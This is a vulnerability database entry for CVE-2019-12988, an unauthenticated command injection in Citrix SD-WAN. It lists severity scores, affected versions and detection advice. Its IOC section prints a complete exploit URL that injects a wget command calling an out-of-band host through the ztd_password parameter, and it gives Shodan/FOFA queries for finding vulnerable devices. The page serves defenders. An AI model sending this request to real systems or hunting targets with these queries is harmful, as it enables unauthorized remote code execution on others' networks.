cbcvebase.
CVE-2019-12988
published 2019-07-16

CVE-2019-12988: Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 4 of 6).

PriorityP187critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
42.55%
98.5th percentile
Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 4 of 6).

Affected

6 ranges
VendorProductVersion rangeFixed in
citrixcitrix_sd-wan
citrixnetscaler_adc_gateway
citrixnetscaler_sd-wan>= 10.0 < 10.0.810.0.8
citrixsd-wan
citrixsd-wan>= 10.2 < 10.2.310.2.3
citrixxenserver

Detection & IOCsextracted from sources · hover to see the quote

url/Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://{{interactsh-url}})
path/Collector/nms/addModifyZTDProxy
command$(/bin/wget$IFS<oast-host>)
  • Detect exploitation attempts by monitoring HTTP GET requests to /Collector/nms/addModifyZTDProxy with shell metacharacters (e.g., $(), $IFS) in the ztd_password parameter.
  • Confirm exploitation via out-of-band (OAST/interactsh) HTTP callback — a successful injection causes the target to issue an outbound HTTP request to an attacker-controlled host.
  • Fingerprint vulnerable Citrix SD-WAN hosts using Shodan query http.title:"Citrix SD-WAN" or FOFA query title="citrix sd-wan" prior to exploitation attempts.
  • Verify target is a Citrix SD-WAN instance by checking that the login page body contains the string "Citrix SD-WAN" (used as a pre-condition matcher in the PoC template).
  • The vulnerability is unauthenticated (PR:N) — no session cookie or token is required; monitor for requests to the /Collector/ path from unauthenticated sources.
  • ·The injection is routed through the Collector controller endpoint, not the main application login — ensure network monitoring covers internal/collector-facing ports and paths, not just the primary web UI.
  • ·The PoC template uses 'unsafe: true', meaning standard HTTP client safety checks are bypassed; detection rules must account for malformed or non-standard HTTP requests to this endpoint.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.